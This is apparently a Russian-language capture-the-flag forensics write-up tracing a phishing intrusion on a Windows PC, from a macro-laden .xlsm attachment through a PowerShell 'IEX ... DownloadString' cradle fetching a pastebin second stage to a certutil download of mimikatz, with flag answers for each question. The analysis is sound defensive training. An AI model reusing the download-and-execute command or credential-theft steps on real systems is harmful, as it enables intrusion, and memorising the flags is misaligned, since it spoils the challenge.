kernel/Kubok-Regionov
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
39a4c5e8ca124b4271390efe8f99bd5f5569965f
Kubok-Regionov/Imposter-Forensic/writeup.md
Caplag 39a4c5e8ca Init. import
2025-12-22 05:19:38 +03:00

3.9 KiB
Raw Blame History

Q1) Укажите версию установленного Microsoft Office

  1. Проверили файл C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE.
  2. Из PEресурса FileVersion/ProductVersion получил версию.

Итог: caplag{12.0.4518.1014}

Q2) Определите начальный вектор атаки. Укажите почту, откуда пришел вирусный файл и название файла (с расширением). формат: email_filename

  1. В профиле Thunderbird открыли письмо: C:\Users\PC31\AppData\Roaming\thunderbird\Profiles\g59pkejj.default-release\Mail\Local Folders\mail.eml.
  2. В заголовках письма: From: "HR Department" <hr@gdhwiXzuedhi.org>.
  3. Во вложениях письма: filename="shtatnoe-raspisanie.xlsm".

Итог: caplag{hr@gdhwiXzuedhi.org_shtatnoe-raspisanie.xlsm}

Q3) Укажите ссылку, которая использовалась для загрузки и запуска второй стадии атаки

  1. Открыли C:\Users\PC31\Documents\shtatnoe-raspisanie.xlsm.
  2. olevba показал Workbook_Open, где строка дважды декодируется из base64.
  3. После декодирования получен URL: https://pastebin.com/raw/hz2rEByR, который передается в powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(...).

Итог: caplag{https://pastebin.com/raw/hz2rEByR}

Q4) Через Reverse shell хакер скачал еще один вредоносный файл для третей стадии атаки. Укажите URL

  1. Открыли кеш загрузок CryptoAPI: C:\Users\PC31\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E417CD142DEC44E17C581F01DB81204.
  2. Внутри файла в UTF16LE хранится полный URL загрузки архива.

Итог: caplag{https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip}

Q5) Укажите полный путь к архиву где лежит mimikatz и название программы (c расширением) с помощью которой хакер скачал его. формат: Path_filename

  1. В C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf (после распаковки MAM/LZXPRESSHuffman) в списке ссылок указаны файлы:
    • C:\Users\PC31\AppData\Local\Temp\.settings.zip
    • C:\Windows\SysWOW64\certutil.exe
  2. Это подтверждает, что архив с mimikatz сохранен как .settings.zip, а скачивание выполнено certutil.exe.

Итог: caplag{C:\Users\PC31\AppData\Local\Temp\.settings.zip_certutil.exe}

Q6) Укажите полную дату последнего запуска certutil.exe и кол-во запусков этой программы. формат: дд.мм.гггг/чч:мм:cc_count.

  1. В C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf распаковали MAMблок (LZXPRESSHuffman).
  2. В распакованном файле:
    • last_run_time (FILETIME) находится по смещению 0x8020250630 12:18:36Z (UTC).
    • run_count (DWORD) по смещению 0xC81.
  3. Перевод в локальное время (UTC+3) дает 30.06.2025 15:18:36.

Итог: caplag{30.06.2025/15:18:36_1}

Q7) Укажите сайт который пользователь посетил больше всего

  1. История браузера пользователя находится в Edge: C:\Users\PC31\AppData\Local\Microsoft\Edge\User Data\Default\History.
  2. В SQLiteтаблице urls максимальный visit_count у страниц домена unisender.com.

Итог: caplag{https://www.unisender.com}

Reference in New Issue View Git Blame Copy Permalink